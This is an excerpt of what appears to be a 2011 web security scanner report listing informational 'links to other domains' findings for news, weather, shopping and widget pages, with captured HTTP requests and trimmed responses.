P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:01 GMT
Content-Length: 701

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-65201734_1304955420,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218" width="1" height="1"/>');

17.26. http://login.npr.org/openid/embed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type="text/javascript"></script>
<link href="http://cdn.rpxnow.com/rel/css/43f1456414c372352b92e25b50c05ac5.css" media="screen" rel="stylesheet" type="text/css" />

<style type="text/css">
...[SNIP]...
</div>
<img class="loading" id="loading"
style="visibility: hidden;"
src="http://cdn.rpxnow.com/rel/img/9a8269421303631316be4ab5e34870e1.gif"/>

</div>
...[SNIP]...
</script>

<script src="http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js" type="text/javascript"></script>
...[SNIP]...

17.27. http://radar.weather.gov/radar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
<div id="noaalink"><a href="http://www.noaa.gov"><img src="graphics/noaalink.gif" alt="Go to the NOAA Homepage" width="80" height="80" border="0">
...[SNIP]...
<div id="nwslink"><a href="http://www.nws.noaa.gov"><img src="graphics/noaalink.gif" alt="Go to the NWS Homepage" width="80" height="80" border="0">
...[SNIP]...
</strong> <a href="http://www.srh.noaa.gov/jetstream/doppler/ridge.htm#range">How does this work?</a>
...[SNIP]...
<td class="footertd1"><a href="http://www.USA.gov/"><img src="graphics/usagov_logo.gif" title="USA.gov is the U.S. government's official web portal" alt="USA.gov is the U.S. government's official web portal" width="110" height="30" border="0">
...[SNIP]...
<br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/radarfaq.htm" class="navbar" title="Frequently Asked Questions">Radar FAQ</a><br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/ridge_download.htm" class="navbar" title="Downloading Images">Downloading Images</a><br>
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/cte.htm" class="navbar" title="Mobile Weather">Mobile Users</a>
...[SNIP]...
<br />
&nbsp;&nbsp;<a href="http://www.srh.noaa.gov/jetstream/doppler/doppler_intro.htm" class="navbar" title="Learn about the operation of dopper radar">Doppler University</a><br>
&nbsp;&nbsp;<a href="http://www.nws.noaa.gov/credits.php#plugins" class="navbar">Color Blindness Tool</a>
...[SNIP]...

17.28. http://shop.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
<br />
<a style="color:#AD0034" target="_blank" href="http://www.thawte.com/digital-certificates/">ABOUT SSL CERTIFICATES</a>
...[SNIP]...

17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/partnerMarketsIntradaySnap.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1EE0F56D53B8C87B4B0244807F4A5FA6

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 strict//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<HTML>
<HEAD>
   

<link href="http://cdn.macroaxis.netdna-cdn.com/skins/minimum.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://cdn.macroaxis.netdna-cdn.com/scripts/minimum.js"></script>
...[SNIP]...
<a href='http://www.macroaxis.com/invest/menu/mainInfo/blogGadgetsTour' target="_blank" title='Macroaxis: Get Financial Widgets' >
           <img src='http://cdn.macroaxis.netdna-cdn.com/images/macroaxisPartnerLogo2.png' alt='Macroaxis: Get Financial Widgets'/></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=123456789?" width="88" height="31" border="0" alt=""></a>
...[SNIP]...
<a href="http://www.macroaxis.com/?pitch=widgetClose" align="right" target="_blank" onclick="javascript:closeAds('xx');" valign='top'>
               <img align='left' src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget.png' onmouseout="src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget.png'" onmouseover="src='http://cdn.macroaxis.netdna-cdn.com/images/buttons/closeWidget_s.png'" title='Hide these Ads for today'>
           </a>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^NYA&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="NYA: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.09 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.09 Moved Up" /></span>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^IXIC&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="IXIC: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.19 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.19 Moved Up" /></span>
...[SNIP]...
<div>&nbsp;<img onError="this.parentNode.innerHTML='';" aling="absbottom" src="http://www.google.com/finance/chart?q=^GSPC&cht=s" /></div>
...[SNIP]...
<strong>USA&nbsp;&nbsp;<img src="http://cdn.macroaxis.netdna-cdn.com/images/flags/us.gif" alt="GSPC: US" /></strong>
...[SNIP]...
<span class="symbolChangeUp" style="font-size:1em; text-align:right; align:right;">0.10 % <img src="http://cdn.macroaxis.netdna-cdn.com/images/arrows/bigChangeUp.gif" alt="Macroaxis: 0.1 Moved Up" /></span>
...[SNIP]...
<a title="Embed or share charts from financial widgets gallery" target="_blank" href="http://www.macroaxis.com/invest/widget">
       <img align="absbottom" onMouseOut="src='http://cdn.macroaxis.netdna-cdn.com/images/embed.png'" onMouseOver="src='http://cdn.macroaxis.netdna-cdn.com/images/embed_s.png'" src="http://cdn.macroaxis.netdna-cdn.com/images/embed.png" alt="Embed Financial Widgets"/></a>
...[SNIP]...

17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...
dth == "") || (width == null) || (typeof width == "undefined"))
width = "320";

if ((height == "") || (height == null) || (typeof height == "undefined"))
height = "240";


var tmpObjStr = '<object id="' + id + '" width="' + width + '" height="' + height + '"' +
' classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"' +
//' codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=6,4,5,715"' +
' align="baseline" border="0"' +
' standby="Loading Microsoft Windows Media Player components..."' +
' type="application/x-oleobject">
';

//set blank WMV file to simulate stop for non IE browsers
if (emulateStop == true)
{
tmpObjStr += '<param name="URL" value="">
...[SNIP]...

17.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.32. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de Mayo: Six fun facts about the Fifth of May" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-us-acincodemayo/10057846-1-eng-US/0505-us-acincodemayo_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" target="_top">Cinco de Mayo: Six fun facts about the Fifth of May</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_65f8ac1f0ff5047c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/PlayStation-Network-back-online-Almost" title="PlayStation Network back online? Almost." target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/specials/future-focus/ff-innovation-facebook-thumb-100x100/10037027-1-eng-US/ff-innovation-facebook-thumb-100x100_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/PlayStation-Network-back-online-Almost" target="_top">PlayStation Network back online? Almost.</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1ec54e24d9e4a3c4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/National-Day-of-Prayer-a-testament-to-America-s-uniqueness-backers-say" title="National Day of Prayer a testament to America&#039;s uniqueness, backers say" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-national-day-prayer.jpg/10057686-1-eng-US/0505-National-Day-Prayer.JPG_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Society/2011/0505/National-Day-of-Prayer-a-testament-to-America-s-uniqueness-backers-say" target="_top">National Day of Prayer a testament to America&#039;s uniqueness, backers say</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7df80b6464f3bc5e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Military/2011/0505/Military-interrogators-Waterboarding-didn-t-yield-tips-that-led-to-bin-Laden" title="Military interrogators: Waterboarding didn&#039;t yield tips that led to bin Laden" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-aenhanced-military-interrogators-waterboarding/10062083-1-eng-US/0505-AENHANCED-Military-interrogators-Waterboarding_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Military/2011/0505/Military-interrogators-Waterboarding-didn-t-yield-tips-that-led-to-bin-Laden" target="_top">Military interrogators: Waterboarding didn&#039;t yield tips that led to bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_294fe04eb7280e24"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Education/2011/0504/A-third-of-high-school-seniors-lack-basic-grasp-of-civics-US-government" title="A third of high school seniors lack basic grasp of civics, US government" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0504-anaepcivics-high-school-seniors-civics-class/10054953-1-eng-US/0504-ANAEPCIVICS-high-school-seniors-civics-class_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Education/2011/0504/A-third-of-high-school-seniors-lack-basic-grasp-of-civics-US-government" target="_top">A third of high school seniors lack basic grasp of civics, US government</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4abfe954b0c2cbdb"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Politics/2011/0503/Fed-up-with-Phoenix-Tucson-talks-secession-from-Arizona" title="Fed up with Phoenix, Tucson talks secession from Arizona" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/2011/0509-weekly/0509-afiftyone-arizona-tucson/10040192-1-eng-US/0509-AFIFTYONE-ARIZONA-TUCSON_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Politics/2011/0503/Fed-up-with-Phoenix-Tucson-talks-secession-from-Arizona" target="_top">Fed up with Phoenix, Tucson talks secession from Arizona</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1368d32d2146a078"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Latest-News-Wires/2011/0504/Geronimo-should-not-be-linked-to-Osama-say-American-Indians" title="Geronimo should not be linked to Osama, say American Indians" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503_geronimo/10051709-1-eng-US/0503_Geronimo_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Latest-News-Wires/2011/0504/Geronimo-should-not-be-linked-to-Osama-say-American-Indians" target="_top">Geronimo should not be linked to Osama, say American Indians</a>
...[SNIP]...
